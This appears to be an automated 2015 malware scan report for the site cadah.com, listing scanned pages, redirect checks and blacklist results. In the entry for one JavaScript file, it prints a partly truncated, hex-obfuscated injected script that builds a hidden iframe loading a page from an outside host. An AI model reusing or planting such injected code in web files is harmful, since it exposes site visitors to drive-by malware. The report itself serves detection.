Scanned pages/files
Request | Server response | Status |
http://cadah.com/ | 200 OK Content-Length: 16172 Content-Type: text/html | clean |
http://cadah.com/index.php | 200 OK Content-Length: 16172 Content-Type: text/html | clean |
http://cadah.com/locations.php | 200 OK Content-Length: 22040 Content-Type: text/html | clean |
http://cadah.com/staff.php | 200 OK Content-Length: 21083 Content-Type: text/html | clean |
http://cadah.com/services.php | 200 OK Content-Length: 18800 Content-Type: text/html | clean |
http://cadah.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 9966 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!73!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!73!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!62!6f!6f!74!63!61!6d!70!78!66!6@!74!6e!65!73!73!2e!63!6f!6d!2f!5f!76!74!6@!5f!62!6@!6e!2f!63!6c!6@!63!6b!65!72!2e!70!68!70!27!3b!d!a!20!20!20!20!73!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!2 Antivirus reports:
| ||
http://cadah.com/insurance.php | 200 OK Content-Length: 16327 Content-Type: text/html | clean |
http://cadah.com/resources.php | 200 OK Content-Length: 17177 Content-Type: text/html | clean |
http://cadah.com/fko.php | 200 OK Content-Length: 15507 Content-Type: text/html | clean |
http://cadah.com/test404page.js | 404 Not Found Content-Length: 402 Content-Type: text/html | clean |
http://cadah.com/staff-harrison.php | 200 OK Content-Length: 16820 Content-Type: text/html | clean |
http://cadah.com/staff-linda.php | 200 OK Content-Length: 15976 Content-Type: text/html | clean |
http://cadah.com/staff-parker.php | 200 OK Content-Length: 17012 Content-Type: text/html | clean |
http://cadah.com/rebecca.php | 200 OK Content-Length: 16586 Content-Type: text/html | clean |
http://cadah.com/Jeannie.php | 200 OK Content-Length: 17226 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cadah.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 04:13:40 GMT
Server: Apache/2.2.14 (Ubuntu) mod_ssl/2.2.14 OpenSSL/0.9.8k mod_fcgid/2.3.4 PHP/5.3.2-1ubuntu4.28 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
Content-Type: text/html
X-Powered-By: PHP/5.3.2-1ubuntu4.28
GET / HTTP/1.1
Host: cadah.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 04:13:40 GMT
Server: Apache/2.2.14 (Ubuntu) mod_ssl/2.2.14 OpenSSL/0.9.8k mod_fcgid/2.3.4 PHP/5.3.2-1ubuntu4.28 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
Content-Type: text/html
X-Powered-By: PHP/5.3.2-1ubuntu4.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: cadah.com
Referer: http://www.google.com/search?q=cadah.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cadah.com
Referer: http://www.google.com/search?q=cadah.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cadah.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cadah.com/
Result: cadah.com is not infected or malware details are not published yet.
Result: cadah.com is not infected or malware details are not published yet.